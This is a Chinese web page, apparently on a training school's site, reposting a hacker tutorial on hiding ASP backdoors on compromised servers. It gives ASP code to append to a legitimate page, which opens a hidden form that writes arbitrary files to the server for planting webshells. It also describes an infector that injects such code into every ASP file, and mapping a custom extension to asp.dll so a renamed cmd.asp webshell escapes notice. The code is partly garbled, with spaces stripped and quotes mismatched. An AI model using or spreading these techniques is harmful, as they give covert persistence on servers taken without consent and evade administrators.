qq在线咨询杨老师 qq在线咨询王老师 qq在线咨询韩老师 qq在线咨询张老师
 
您当前位置:主页 > .NET百科 >

代码详解:ASP后门的放置方法
2016-03-01 17:19

       传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。一种是aspInjection(好像这个词真流行呀)。一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。

       看一下,用了[url]http://xxx/admin.asp?id=1[/url]就多出一个东东来了,第二个图下面这个框,你可以用它来生成网页木马,可以生成asp/php/cgi等网页后门。怎么做到的呢?只要你将这段代码插入某个asp网页代码最下端即可。

<%
onerrorresumenext
id=request("id")
ifrequest("id")=1then
testfile=Request.form("name")
msg=Request.form("message")
setfs=server.CreateObject("scripting.filesystemobject")
setthisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
setfs=nothing
%>
<formmethod="POST"ACTION="你要插入的asp文件名?id=1">
<inputtype="text"size="20"name="Name"

value="http://blog.77169.com/<%=server.mappath("xp.asp"")%>>
<textareaname="Message"class=input>
   </textarea>
<inputtype="submit"name="Send"value="生成"class=input>
  </form>
<%endif%>

      值得注意的是这段代码要求服务器支持fso,并且不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有这样的代码,这段代码就不生效了,但不会影响原文件使用。如果你会写asp,你可以将一些asp后门直接写在肉鸡原有的asp文件里。

      版主allen写了一个asp文件,一运行会感染所有的asp文件,同目录下每个asp文件都会被插入类似的代码。不知他几时提供下载。:_)

      第二,在iis管理器中用asp.dll来解析任意后缀名。像图3,

      我把后缀为lcx的文件名用asp.dll来解析。这样,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么?


相关信息:
·ASP.NET数据处理控件 北大青鸟学士后 ·ASP.Net和ASP的区别
青鸟热门课程安卓工程师
青鸟热门课程网络营销师
青鸟热门课程网络工程师
青鸟热门课程JAVA工程师
青鸟热门课程.NET工程师
.NET行情
 
Copyright © 2002-2015 北大青鸟北京北方华腾技术培训中心 版权所有 地址:北三环中路马甸桥东北角商房大厦(国美电器)626 招生热线:010-82011433/32
京ICP备05043413号 京公网安备 11010802023056号